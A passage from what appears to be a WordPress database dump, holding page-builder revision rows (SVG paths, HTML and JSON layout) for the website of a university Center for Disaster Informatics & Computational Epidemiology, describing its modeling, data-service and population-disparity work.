d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',22,'https://gsudice.dataconn.net/?p=377',0,'revision','',0),(381,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Computational modeling &amp; spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Enable the development of inclusive public health and disaster preparedness efforts&nbsp;that overcome place- and context-specific access disparities&nbsp;<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:26:09','2022-02-16 18:26:09','',168,'https://gsudice.dataconn.net/?p=381',0,'revision','',0),(382,1,'2022-02-16 18:26:09','2022-02-16 18:26:09','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Computational modeling &amp; spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content 